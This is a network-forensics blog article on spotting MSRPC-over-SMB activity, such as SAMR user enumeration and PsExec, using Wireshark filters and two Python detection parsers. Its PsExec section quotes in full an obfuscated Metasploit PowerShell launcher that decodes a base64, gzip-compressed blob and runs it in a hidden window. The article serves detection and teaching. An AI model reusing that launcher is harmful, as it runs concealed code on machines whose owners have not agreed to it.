Petr Stuchlík for NetrixOne

SMB: metadata in RPC

They call it DCE/RPC, but at the end of the day it's just a huge pile of cleartext metadata on your network.

This is another article in the series on metadata for network forensics. In the previous article I gave some examples of metadata hiding in common SMB file transfers, and today I am going to briefly describe Remote Procedure Calls over SMB.

While Samba is mostly known as a file and printer sharing solution, it also provides Named Pipes to facilitate communication between local and remote processes.

In Windows networks, Named Pipes are typically used by the MSRPC protocol. MSRPC is basically an implementation of the Distributed Computing Environment Remote Procedure Call (DCE/RPC) protocol, used to execute functions on a remote endpoint and to transfer data. This allows MSRPC to copy files, work with the remote Windows registry and manage Windows services, while having the benefit of the SMB authentication layer (since a named pipe is just another type of "share"). The following services are typical examples of MSRPC traffic generators:

  • MS Sharing
  • MS Security (NLMSSP)
  • MS Active Directory
  • MS Print
  • MS Terminal Server
  • MS Remote Services

So e.g. Spoolsvc.exe can generate a packet which looks like this:

+-------------------------------+
|              IP               |
+-------------------------------+
|             TCP               |
+-------------------------------+
|        SMB Named Pipe         |
+-------------------------------+
|        MSRPC (DCE/RPC)        |
+-------------------------------+
|     Print Spooler Service     |
+-------------------------------+

401TRG compiled an excellent resource on this topic, and the packet samples in the following sections are borrowed from their work.

Domain users enumeration

The Security Account Manager (SAMR) protocol uses SMB as one of its transport protocols. In this case, SMB connects to the samr pipe on the IPC$ share. It can then invoke SAMR methods to enumerate domains (samr.opnum == 6), enumerate domain users (samr.opnum == 13), query user info (samr.opnum == 36) etc. The following filter shows packets with user information.

(Screenshot: samr user enum packet)

Wireshark filter: samr.samr_EnumDomainUsers.sam or samr.samr_QueryUserInfo.info
PCAP sample: smb_net_user.pcap by 401TRG
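To make those opnum values concrete, here is an added example (my code, not the article's or 401TRG's) that decodes the DCE/RPC bind and request PDUs carried inside the named pipe payload. It maps each request's presentation context id back to the interface UUID announced in the bind, and names the three SAMR methods mentioned above. The samr and svcctl interface UUIDs and the NDR transfer syntax UUID are the published MS-SAMR / MS-SCMR / DCE values; the PDUs it is fed are constructed inline rather than taken from the PCAP.

```python
"""Decode DCE/RPC (MSRPC) bind and request PDUs from an SMB named pipe and name
the SAMR operations they invoke.  Added example, not code from the original
article or from 401TRG; the sample PDUs are constructed inline."""
import struct
import uuid

# Interface UUIDs advertised in bind requests (MS-SAMR, MS-SCMR) and the
# NDR transfer syntax that clients propose alongside them.
SAMR_UUID = uuid.UUID("12345778-1234-abcd-ef00-0123456789ac")
SVCCTL_UUID = uuid.UUID("367abb81-9844-35f1-ad32-98f038001003")
NDR32_UUID = uuid.UUID("8a885d04-1ceb-11c9-9fe8-08002b104860")
INTERFACES = {SAMR_UUID: "samr", SVCCTL_UUID: "svcctl"}

# The SAMR opnums the article names (MS-SAMR operation numbers).
SAMR_OPNUMS = {6: "EnumDomains", 13: "EnumDomainUsers", 36: "QueryUserInfo"}

PTYPE_REQUEST, PTYPE_BIND = 0, 11
PFC_FIRST_FRAG, PFC_LAST_FRAG, PFC_OBJECT_UUID = 0x01, 0x02, 0x80


def parse_pdu(pdu):
    """Parse the 16-byte common header plus a bind or request body into a dict."""
    if len(pdu) < 16:
        raise ValueError("truncated DCE/RPC header")
    vers, _minor, ptype, flags, drep = struct.unpack_from("<BBBB4s", pdu, 0)
    if vers != 5:
        raise ValueError("not a DCE/RPC v5 PDU")
    endian = "<" if drep[0] & 0x10 else ">"        # packed_drep[0] bit 4: integer byte order
    frag_len, _auth_len, call_id = struct.unpack_from(endian + "HHI", pdu, 8)
    if frag_len > len(pdu):
        raise ValueError("frag_length exceeds buffer")
    info = {"ptype": ptype, "flags": flags, "call_id": call_id}
    if ptype == PTYPE_REQUEST:
        _alloc_hint, ctx_id, opnum = struct.unpack_from(endian + "IHH", pdu, 16)
        off = 24
        if flags & PFC_OBJECT_UUID:                # optional object UUID precedes the stub
            info["object"] = uuid.UUID(bytes_le=pdu[24:40])
            off = 40
        # stub data (an auth trailer, if auth_length > 0, would sit at its end)
        info.update(context_id=ctx_id, opnum=opnum, stub=pdu[off:frag_len])
    elif ptype == PTYPE_BIND:
        n_ctx = pdu[24]                            # after max_xmit, max_recv, assoc_group
        off, contexts = 28, []
        for _ in range(n_ctx):
            ctx_id, n_ts = struct.unpack_from(endian + "HB", pdu, off)
            abstract = uuid.UUID(bytes_le=pdu[off + 4:off + 20])
            (version,) = struct.unpack_from(endian + "I", pdu, off + 20)
            contexts.append((ctx_id, abstract, version))
            off += 24 + 20 * n_ts                  # skip the proposed transfer syntaxes
        info["contexts"] = contexts
    return info


def _pdu(ptype, call_id, body):
    """Common header: version 5.0, first+last fragment, little-endian NDR drep."""
    return struct.pack("<BBBB4sHHI", 5, 0, ptype, PFC_FIRST_FRAG | PFC_LAST_FRAG,
                       b"\x10\x00\x00\x00", 16 + len(body), 0, call_id) + body


def build_bind(iface, version=1, ctx_id=0, call_id=1):
    """Constructed bind with one presentation context proposing NDR v2."""
    body = struct.pack("<HHIBBH", 4280, 4280, 0, 1, 0, 0)
    body += struct.pack("<HBB", ctx_id, 1, 0) + iface.bytes_le + struct.pack("<I", version)
    body += NDR32_UUID.bytes_le + struct.pack("<I", 2)
    return _pdu(PTYPE_BIND, call_id, body)


def build_request(opnum, ctx_id=0, call_id=2, stub=b""):
    """Constructed request: alloc_hint, context id, opnum, then the stub."""
    body = struct.pack("<IHH", len(stub), ctx_id, opnum) + stub
    return _pdu(PTYPE_REQUEST, call_id, body)


def triage(pdus):
    """Follow one pipe's PDUs in order: the bind maps context ids to interfaces,
    each request is then labelled (call_id, interface, opnum, SAMR method or None)."""
    bound, findings = {}, []
    for pdu in pdus:
        info = parse_pdu(pdu)
        if info["ptype"] == PTYPE_BIND:
            for ctx_id, abstract, _version in info["contexts"]:
                bound[ctx_id] = INTERFACES.get(abstract, str(abstract))
        elif info["ptype"] == PTYPE_REQUEST:
            iface = bound.get(info["context_id"], "unbound")
            method = SAMR_OPNUMS.get(info["opnum"]) if iface == "samr" else None
            findings.append((info["call_id"], iface, info["opnum"], method))
    return findings


# Constructed stand-in for the samr pipe traffic in smb_net_user.pcap.
SAMPLE_PDUS = [build_bind(SAMR_UUID), build_request(6, call_id=2),
               build_request(13, call_id=3), build_request(36, call_id=4)]

if __name__ == "__main__":
    for call_id, iface, opnum, method in triage(SAMPLE_PDUS):
        print(f"call_id={call_id} {iface} opnum={opnum} {method or ''}")
```

Everything the triage needs is in cleartext: the interface UUID in the bind and the opnum in each request, which is exactly why `samr.opnum` filters work without any decryption. On real traffic you would first reassemble the SMB WriteRequest / ReadResponse (or Transaction/Ioctl) payloads of one pipe handle in order, because a bind on one file handle says nothing about requests on another.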

PsExec

PsExec is a popular Sysinternals Suite tool for remote administration in Active Directory environments and is often an attacker's favorite choice for remote code execution. A deep dive into PsExec can be found in this blog.

In a basic attack scenario the binary PSEXESVC.exe is transferred over the SMB protocol to a victim machine using the ADMIN$ share. It is then executed remotely as a temporary service using the IPC$ share. The following filter will match SMB transfers and invocations of PsExec based on filename detection.

Wireshark filter: smb.file ~ "PSEXESVC" or smb2.filename ~ "PSEXESVC" or svcctl.servicename ~ "PSEXESVC"
PCAP sample: smb_psexec_add_user.pcap by 401TRG

It is however worth noting that such a file transfer usually triggers alarms, so PsExec modules such as Metasploit's attempt to evade it by invoking PowerShell via RPC. An example of how Metasploit obfuscates its payload:

%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -c if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIfj8FkCA71WbW/aSBD+nEr9D1aFZFsl2BDaNJEqnW0gEDABHCDAoWhjr+2FtZfY6/DS63+/MdgNVZoq1w9ksdH5/YuhG/v3530UIQCQSr4y6ZxnxSFwkOX+BEn8skJzBaCbmt037OGdC18FaSZtlrVWIBIOL+8NJIowiE/9EtXmGtxjIMHSnAsycI/wtjHET69eVhgmwvfhMJ96YqyB0Qzs62BbB8Lp1ropHMdZqMUXslaUcIl8e+/RXl2Wp6X6o8JorEkWtuY46DkUCrKwnc53fB2u8KSaBI7YjFzeWlMwrNKaRjGyMVdWO0Jm5j7zIlFGc4CvwjzJAqFo1OlyxyMJBGavYjZmuNEOEafUit8YkssFcKE0qLwlzTLMAySkJMAwzzHEVtZOHoiNo5LTRQ6FA+wO5e6eJ0f/a1O0rETWPV4JBchMq+CNZmTUHzwF+WXcLOYyvAcxRWo+P7+3ft3bq6HhVpF1xN3MDg7FgS0Tmb7Nga8Uo/FZG/9VVCLggl7Is6iLXQLt1GC5bkwS6Mxm8+FAh2onduhXnx9iXJuD9Ye2d7A0GzEiDMHlyxUhU05Cax04nXN1bBLQlzbhiggdi4r6VfcY5fi/WlLuVkXUEliNoGdGqbYQzzlsSjMXrrVA8J/+OoJoQ6ONBviFwMqCK38M5hDaCSxFZo4AJ4OfRHC4IKYcW6dCXib7572wUg0KIrjotBLIJvsomBhRLFTFLQwJtmUlnC2b4rPcM2EcmKjmOfLzeUfRGYbGiyMeZTYEDs4/K21wjZBNOWiKDSJg/WtRbx8Y/GXTBiIUhJ6sNITRAJGUgYsnioiAox59OWShXkrWFEcgNk+tRsUeZDIWSLsVYQ87IgvUOYaPwg6JSRn4ggjRNmijBeFEYk4XBEpuamW/hjC0f1wAGNEOIuJlCfNTN/yVOSFDZk+erpubrxUohlLe04iDnw0IhboKMafqxaPgC3pg3JDDA2eSSukpq0vSVlbk3LLhP+QnLVY7dxpXy+aSlTb+K7Wiltms1frN5vVp2trVOVWvcXbvRY363eLhaU1B8MJn7a05i1Rl5PqbnVNdlZHcyYb5fNO361VfbNbeI47qbmud+5ag/KnBumMjb6uVlCnVk86Y32tq9W4TtbNPhn2l9cN/jAZUTR0Fe+ufIHIphMtRmVm7lqaduWf2btrd3Tlm8520lQuxtWlVtc0I6yPGjprT/RI6ykj5K3Yuu21zcAzNL1hEzztDxt6v9/QteHV4rF2oXjge4d8fTyqkOnqbuBDvwEQ2opabTl4xyZ9IOmKacgbgI1nVGzfBZvaR03/2GVxBS11pulg05g+Aq7JqtGjMH87rDBtRLt3SOtMtw1FKU96Va2pkvGVp6VLIk/vIy1+qu1qSnnkMGf8qTtxldEdPVdqxu3KdhVFWTdrbXta3ny5Oa/q6qMRkIA+VBzlYvhFD+FkvSfP6Y/PB5vu9gH2GyrK6EMqHdBOwTfak+sjMbx235soin1EQSRwheeZ2mBRI7uPe4ykHpL0XKeXOAoxhdIGxS+Xu0Yps9P6cHR9Q4U61I05ZO4QmmeVX7Zk4Yeh/Fw38qHLyykAhjR61nipg0OP+0V1c6aqcP+rm6oK5377UQ222kpHCxbTKnKg7OeN6H4jOc21gpPsIkzuw/+B1CzVfXg5byP1eew3s28iWi1mRLwY/3ngPxH+ZzSMEeFgbsGNRfGhhP6OjUxNR58eechAKW72pJ+CNwk/7cJXyb/ONMdWhAoAAA==''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);

Wireshark alone won't get you very far here, but sometimes you should be able to spot PowerShell in SMB packets and work from there:

Wireshark filter: smb.file ~ "POWERSHELL" or smb2.filename ~ "POWERSHELL" or svcctl.binarypathname ~ "POWERSHELL"
PCAP sample: smb_metasploit_psexec_pth_download_meterpreter.pcap by 401TRG
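Both the PsExec filter and the PowerShell filter above rest on the same observation: the name a client opens over SMB2 travels in cleartext in the CREATE request, whether it is PSEXESVC.exe pushed to ADMIN$ or a pipe opened on IPC$. The following is an added example (my code, not the article's or 401TRG's) of the `smb2.filename ~ "..."` part of those filters done by hand: it pulls the UTF-16LE filename out of raw SMB2 CREATE requests and flags the two substrings the article watches for. The sample messages are constructed inline; the SMB2 header and CREATE layouts follow MS-SMB2.

```python
"""Extract the filename from SMB2 CREATE requests and flag names that match the
article's filters.  Added example, not code from the original article or from
401TRG; the sample messages are constructed inline."""
import struct

SMB2_MAGIC = b"\xfeSMB"
SMB2_CREATE = 0x0005
SMB2_FLAGS_SERVER_TO_REDIR = 0x00000001      # set on responses, clear on requests
# Substrings mirrored from the filters smb2.filename ~ "PSEXESVC" / ~ "POWERSHELL".
WATCHLIST = {"PSEXESVC": "PsExec service binary", "POWERSHELL": "PowerShell invocation"}


def parse_smb2_create(msg):
    """Return the filename of an SMB2 CREATE request, None for any other SMB2 message."""
    if msg[:4] != SMB2_MAGIC:
        raise ValueError("not an SMB2 message")
    struct_size, _charge, _status, command, _credits, flags = struct.unpack_from("<HHIHHI", msg, 4)
    if struct_size != 64:
        raise ValueError("bad SMB2 header StructureSize")
    if command != SMB2_CREATE or flags & SMB2_FLAGS_SERVER_TO_REDIR:
        return None
    (req_size,) = struct.unpack_from("<H", msg, 64)   # CREATE request body starts after the header
    if req_size != 57:
        raise ValueError("bad CREATE request StructureSize")
    name_off, name_len = struct.unpack_from("<HH", msg, 64 + 44)   # NameOffset, NameLength
    if name_off + name_len > len(msg):
        raise ValueError("filename runs past the end of the message")
    return msg[name_off:name_off + name_len].decode("utf-16-le")


def build_smb2_create(filename, message_id=1, tree_id=1):
    """Constructed CREATE request: 64-byte header, 56-byte fixed body, then the name."""
    name = filename.encode("utf-16-le")
    header = struct.pack("<4sHHIHHIIQIIQ16s", SMB2_MAGIC, 64, 1, 0, SMB2_CREATE, 1, 0, 0,
                         message_id, 0xFEFF, tree_id, 0x1234, b"\0" * 16)
    # ImpersonationLevel=2, DesiredAccess, FileAttributes=NORMAL, ShareAccess=RWD,
    # CreateDisposition=FILE_OPEN, CreateOptions=NON_DIRECTORY, NameOffset=64+56
    body = struct.pack("<HBBIQQIIIIIHHII", 57, 0, 0, 2, 0, 0, 0x0012019F, 0x80, 7, 1, 0x40,
                       64 + 56, len(name), 0, 0)
    return header + body + name


def scan(messages):
    """Return (filename, reason) for every CREATE request whose name hits the watchlist."""
    hits = []
    for msg in messages:
        name = parse_smb2_create(msg)
        if name is None:
            continue
        upper = name.upper()                      # the Wireshark ~ operator is case-sensitive;
        for needle, reason in WATCHLIST.items():  # matching case-insensitively is stricter
            if needle in upper:
                hits.append((name, reason))
    return hits


# Constructed stand-in for the CREATE requests seen in the two PCAPs above:
# the service binary pushed to ADMIN$, two IPC$ pipe opens, and a PowerShell path.
SAMPLE_MESSAGES = [
    build_smb2_create("PSEXESVC.exe", message_id=1, tree_id=1),
    build_smb2_create("svcctl", message_id=2, tree_id=2),
    build_smb2_create("srvsvc", message_id=3, tree_id=2),
    build_smb2_create("\\Windows\\Temp\\powershell.exe", message_id=4, tree_id=1),
]

if __name__ == "__main__":
    for filename, reason in scan(SAMPLE_MESSAGES):
        print(f"{reason}: {filename}")
```

Two caveats when running something like this over real captures: the share name is not in CREATE but in the preceding TREE_CONNECT, so join on TreeId if you want "ADMIN$ vs IPC$" in the finding, and the `svcctl.servicename` / `svcctl.binarypathname` halves of the filters live inside the DCE/RPC stub written to the svcctl pipe, which this parser does not decode.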


As you can see, RPC can be used to call remote functions, which can also mean starting a remote service, which in turn can do almost anything you want. Next time I am going to dig into some bits of SMB traffic that can prove useful for endpoint fingerprinting.
